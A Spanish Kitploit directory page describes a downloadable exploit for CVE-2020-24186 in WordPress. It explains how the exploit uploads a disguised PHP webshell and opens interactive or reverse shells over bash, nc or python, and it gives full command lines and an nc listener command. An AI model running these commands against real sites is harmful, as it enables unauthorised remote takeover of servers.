Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-24186 | Kitploit
Herramientas/GitHubGitHub/gazettel/cve-2020-24186
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónShellcodeExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubgazettel/cve-2020-24186

CVE-2020-24186

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-24186

Este script explota la vulnerabilidad CVE-2020-24186 en WordPress para subir un payload PHP camuflado y obtener una shell en el sistema objetivo. Hay tres modos de operación:

  1. Shell interactiva:
    Sube la webshell básica y entra en un modo interactivo, permitiéndote enviar comandos a través del parámetro cmd.

  2. Shell inversa manual:
    Sube la webshell y envía el payload de shell inversa, pero no lanza automáticamente un listener. Debes iniciar manualmente tu propio listener en la IP y el puerto especificados.

  3. Shell inversa con pwntools:
    Sube la webshell, envía el payload de shell inversa, y el script lanza automáticamente un listener usando pwntools para capturar la conexión inversa.

Requisitos

  • Python 3.x
  • Bibliotecas de Python:
    • requests
    • pwn (pwntools)
  • (Opcional) Configuración de proxy si quieres enrutar el tráfico (p. ej., para probar con Burp Suite).

Opciones de uso

  • --url: URL base del sitio objetivo (p. ej., http://10.10.110.119).
  • --blogpath: Ruta a la entrada (por defecto: /?page=1).
  • --mode: Modo de operación, ya sea interactive o reverse.
  • --lhost: IP local para la shell inversa (requerida en modo reverse).
  • --lport: Puerto local para la shell inversa (requerido en modo reverse).
  • --reverse_method: Método de shell inversa: bash, nc o python (por defecto es bash).
  • --manual: Cuando se usa en modo reverse, el script no lanzará el listener; debes iniciar tu propio listener manualmente.
  • --use-proxy: Si se establece, las peticiones se enviarán a través del proxy configurado.

Ejemplos

1. Shell interactiva

Sube una webshell e inicia una sesión interactiva para enviar comandos:

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode interactive --use-proxy

2. Shell inversa en modo manual

Sube la webshell, envía el payload de shell inversa, pero no inicies un listener automáticamente. Inicia tu propio listener manualmente (p. ej., usando netcat):

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --manual --use-proxy

Luego, en otra terminal, inicia tu listener manualmente:

root@kitploit:~
nc -lvnp 9002

1. Shell inversa con pwntools

Sube la webshell, envía el payload de shell inversa y haz que el script lance automáticamente un listener con pwntools para capturar la conexión:

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --use-proxy

El script esperará una conexión en 10.10.1.1:9002 y, una vez conectado, proporcionará una shell interactiva.

Notas Asegúrate de que el sitio objetivo sea vulnerable a CVE-2020-24186 y de que tengas los permisos necesarios para realizar pruebas de seguridad. Puedes modificar el payload PHP usando la opción --php_payload si necesitas ajustes. Comprueba la configuración del proxy si usas la opción --use-proxy.

Descargar herramienta